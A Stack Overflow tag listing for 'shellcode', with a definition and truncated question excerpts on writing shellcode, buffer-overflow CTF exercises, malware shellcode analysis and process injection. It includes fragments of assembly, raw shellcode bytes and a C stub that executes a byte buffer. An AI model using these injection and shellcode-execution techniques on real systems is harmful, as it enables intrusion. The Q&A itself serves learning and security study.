Stack Overflow
Stack Overflow

Questions tagged [shellcode]

A shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability.

Shellcodes get that name because they typically start a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient.

Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).

681 questions
0
votes
1 answer

Shell code print character(64bits)

I have a problem with this shell code. When I run the assembler code it prints the caracter, but when I call it as a function from c it does not. I used gdb to test all the instruction executed and it seems to execute all the instructions. It is…
tuket
  • 3,232
  • 1
  • 26
  • 41
0
votes
1 answer

Modifying a byte in memory using shellcode

I have been trying to create a simple chunk of shell code that allows me to modify a string by doing something simple like changing a letter, then print it out. _start: jmp short ender starter: xor ecx, ecx ;clear out…
user99545
  • 1,173
  • 3
  • 16
  • 32
0
votes
1 answer

Shellcode gives SyntaxError in gdb

I'm trying to pass shellcode as the command-line argument in a C program. But gdb keeps giving me SyntaxError. What am I doing wrong? Below are the contents of the C program and the shellcode: vulnerable.c #include #include…
green
  • 605
  • 1
  • 8
  • 13
0
votes
1 answer

Basic Shellcode for connect() Function

I am writing shellcode on Ubuntu 11.10 x86 and the registers prior to the int 0x80 syscall look like this: eax 0x66 ecx 0x8e60558 edx 0x0 ebx 0x3 which is set up for the connect() syscall. The value in the ecx register is an…
Bhubhu Hbuhdbus
  • 1,489
  • 6
  • 24
  • 31
0
votes
2 answers

Shellcode searching for Bytes String: 0C330408Bh

I am learning how malware(Blackhole Exploit) works. I extracted the shellcode from a malicious code. I figured out everything except a search for the Byte String. Can anyone help me with this? Why does this shellcode (most of the malicious…
Abhineet
  • 5,320
  • 1
  • 25
  • 43
-1
votes
2 answers

Address woes from Hacking: The Art of Exploitation

I bought this book recently titled: Hacking: The Art of Exploitation (2nd Edition) and it's been bugging me so much lately. Anyway, with one of the examples, firstprog.c : #include int main() { int i; for(i=0; i < 10; i++) { // Loop 10…
jaykru
  • 35
  • 2
-1
votes
1 answer

How can I input shellcode via stdin that will be read as shellcode instead of a string literal from stdin?

I am doing a (legal) binary exploitation practice and there is a vulnerable buffer to which I am trying to write a specific memory address. However the user input is collected via fgets from stdin an when I enter my input it does not get parsed as…
Emily
  • 1
  • 1
-1
votes
1 answer

Buffer Overflow exploitation to get a shell

I've spent hours trying to figure out the problem about my exploitation. I tried to exploit the vuln-machine explained in this page:…
Alessandro Romeo
  • 11
  • 1
-1
votes
1 answer

Exploit BufferOverFlow to read content of File with verification of input

I have a CTF challenge in which i've got a simple code vulnerable to buffer over flow (via strcpy) which looks like: #include #include int display(char *text) { char buffer[20]; strcpy(buffer, texte); …
E Epsylon
  • 56
  • 1
  • 6
-1
votes
1 answer

Thread Execution Differences Between CreateThread and CreateRemoteThread

I am trying to learn how to do process injections. First, I learn shellcode types in C/C++. However, I met a problem. One code is written by using CreateThread. That is okay but after CreateThread, I have to use WaitForSingleObject function to…
Pytai
  • 5
  • 2
-1
votes
1 answer

How to change hex to shellcode bytes

0x62, 0x75, 0x66, 0x20, 0x3d, 0x20, 0x20, 0x62, 0x22, 0x22, 0x0a, 0xeb, 0x7c, 0x38, 0x5c, 0x78, 0x34, 0x65, 0x5c, 0x78, 0x32, 0x39, 0x5c, 0x78, 0x31, 0x35, 0x5c, 0x78, 0x39, 0x39, 0x5c, 0xeb, 0x34, 0xeb, 0x27, 0x65, 0x5c, 0x78, 0x64, 0x36, 0x5c,…
Ben kubi
  • 1
  • 4
-1
votes
1 answer

How i can get this memory address in Protostar stack 5 CTF

I found this solution for solving protostar's ctf stack5 challenge. The solution works, but I can't figure out how in the stack diagram section we get the address: 0xbffff800 . I understand that NOPs have been added, but how do you get to how many…
Gabriele Pisapia
  • 111
  • 1
  • 8
-1
votes
1 answer

Go: Why do processes/Threads started using Win32API funcs seem to hijack and kill the parent proccess?

Now, the following code does what it's supposed to do, load calc.exe to memory and execute it, it does that fine. I've stitched together this code to show CreateThread() Killing my program's execution flow right before popping calc.exe, Simply after…
THX1339
  • 17
  • 3
-1
votes
1 answer

Data found in PE full image but not in segment?

I have below C program which is compiled to binary: bin.c: #include #include int main(){ unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00"; printf("Shellcode Length: %d\n", strlen(buf)); int (*ret)() =…
hashy
  • 175
  • 10
-1
votes
1 answer

How to create a native C++ DLL that I can run with rundll32.exe without specifying an entry point

How I will be able to create a native dll that I can execute with rundll32.exe without specifying an entry point: Example : C: \> rundll32.exe mydll.dll I created a DLL project on visual studio but I don't know where to put my code: DLL project…
achraf lagmou
  • 11
1 2 3
45 46